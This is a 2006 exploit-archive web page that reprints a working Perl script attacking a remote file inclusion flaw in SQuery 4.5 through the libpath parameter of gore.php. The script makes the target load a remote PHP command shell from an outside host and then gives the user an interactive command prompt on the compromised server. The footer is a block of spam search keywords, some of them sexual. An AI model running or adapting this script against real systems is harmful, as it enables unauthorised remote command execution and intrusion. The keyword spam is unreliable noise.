about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , SQuery <= 4.5(libpath) Remote File Inclusion Exploit-in perl




2006-07-15 SQuery <= 4.5(libpath) Remote File Inclusion Exploit-in perl 
Rated as : Moderated Risk
SQuery <= 4.5(libpath) Remote File Inclusion Exploit-in perl
------------------
#!/usr/bin/perl
##
# SQuery <= 4.5(libpath) Remote File Inclusion Exploit
# hadihadi_zedehal_2006&a.nosrati
#
# virangar security team
#
#
##
# www.virangar.net&www.virangar.org
#
##
# usage:
# perl vir.pl <target> <cmd shell location> <cmd shell
variable>
#
# perl vir.pl http://target.com/SQuery/lib/ http://yorshell.com/cmd.php
cmd
#
##
# #
#greetz:hadi_aryaie2004&ahmad_virangar2004&mahtab_e66&all virangar
members
#
# Contact:  info@virangar.net hadihadi_zedehal_2006@yahoo.com
##
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
      print "[shell] \$";
while(<STDIN>)
      {
              $cmd=$_;
              chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET
=>$Path.'gore.php?libpath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die
"\nCould Not connect\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return
="";}
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return
=~/: Cannot execute a blank command in <b>/)
      {print "\nCould Not Connect to cmd Host or Invalid Command
Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print
"\nInvalid Command or No Return\n\n"}
if($return =~ /(.*)/)
{
      $finreturn = $1;
      $finreturn=~ tr/[ê]/[\n]/;
      print "\r\n$finreturn\n\r";
      last;
}
else {print "[shell] \$";}}}last;
sub head()
 {
 print
"\n============================================================================\r\n";
 print " *SQuery <= 4.5(libpath) Remote File Inclusion
Exploit*\r\n";
 print
"============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl vir.pl <target> <cmd shell location>
<cmd shell variable>\r\n\n";
 print " <Site> - Full path  ex:
http://www.site.com/SQuery/lib/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g
http://www.yourshell.com/cmd.php \r\n";
 print " <cmd variable> - Command variable used in php shell
\r\n";
 print
"============================================================================\r\n";
 print "                   coded by hadihadi_zedehal_2006&a.nosrati
\r\n";
 print "                    www.virangar.net*www.virangar.org
\r\n";
 print
"============================================================================\r\n";
 exit();
 }

securitydot.net - 2006-07-15

Advertising

Copyright 2007, SecurityDot
Sun, 06 Dec 2009 11:39:51 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
include.ph ttp://shop postgre news for c horse havi sex vedio Priti sexi ip+board+2 news for c pictures s sexmove.co WwW.116751 fadihat ha guest book chat-waptr imag girl Port 3127 www.urfash www.xiaowu apache 1.3 news for / Crack Data movie hots news for c WWW.875.gd www.cnwanl 200+%252Fa Sexteens// mambo Remo www. tamil Porn nude for www.x www.sex.co Nudewoman msn xs news for C Fat woman 68.1e68.co luckcr.blo Sexy ledy 200 /compo PleskContr dd123.qrqr www.you to zoo seks www.mir200 maisenger windows se www.tamilx news for C